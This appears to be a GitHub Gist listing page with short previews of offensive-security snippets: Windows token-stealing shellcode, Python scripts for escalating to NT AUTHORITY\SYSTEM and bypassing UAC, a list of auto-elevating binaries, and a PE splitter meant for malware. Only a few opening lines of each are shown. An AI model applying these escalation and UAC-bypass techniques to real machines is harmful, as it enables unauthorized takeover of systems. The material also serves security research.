christoph2
/ structureWithEnums.py
Last active
August 9, 2025 01:23
Add missing enum feature to ctypes Structures.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ctypes | |
| import enum | |
| # | |
| # Prerequisits: | |
| # ------------- | |
| # If you are using Python < 3.4 run `pip install enum34`. | |
| # | |
| # Problem Definition | |
| # ------------------ |
hugsy
/ win81-token-stealing-shellcode.asm
Last active
March 5, 2021 16:31
Token stealing shellcode for Windows 8.1 x64
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;; | |
| ;; Token stealing shellcode for Windows 8.1 x64 | |
| ;; | |
| ;; Save the current context on the stack | |
| push rax | |
| push rbx | |
| push rcx | |
| ;; Get the current process |
DiabloHorn
/ pe-aware-split.py
Created
November 12, 2017 17:47
Split file while preserving PE format
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # DiabloHorn https://diablohorn.com | |
| # blank out bytes taking into account the PE file format | |
| # input file: base64 malware.exe | rev > enc.txt | |
| import sys | |
| import os | |
| #pip install pefile | |
| import pefile | |
| import argparse | |
| import logging |
berzerk0
/ CTFWRITE-Europa-HTB.md
Last active
November 15, 2018 19:19
CTF Writeup: Europa on HackTheBox
makelariss
/ popshellslikeitsatuesday.py
Last active
August 17, 2025 03:17
NT AUTHORITY\SYSTEM through Handle Inheritance using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| import enum, os, sys | |
| # https://twitter.com/highsenburger69 | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
makelariss
/ autoelevate.lst
Created
December 16, 2017 15:10
All Windows 10 RS3 [Version 10.0.16299] Binaries with <autoElevate></autoElevate> set to True
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate> | |
| C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate> |
makelariss
/ uacbypassSlui_exe.py
Last active
September 30, 2019 17:34
Tested on Microsoft Windows [Version 10.0.16299.192]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation | |
| ''' | |
| slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking. | |
| Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution. | |
| Due to the registry key being accessible from user mode, an arbitrary executable file can be injected. | |
| ''' | |
| from _winreg import * | |
| HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) |
makelariss
/ uacbypasstokenmanipulation.py
Last active
April 27, 2025 07:04
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
| # This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32' , use_last_error=True) |
makelariss
/ popshellslikeitsasaturday.py
Last active
May 18, 2024 19:06
NT AUTHORITY\SYSTEM through Token Impersonation using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| # All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
makelariss
/ popshellslikeitsafriday.py
Last active
December 17, 2021 05:31
NT AUTHORITY\SYSTEM through Named Pipe Impersonation using Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
OlderNewer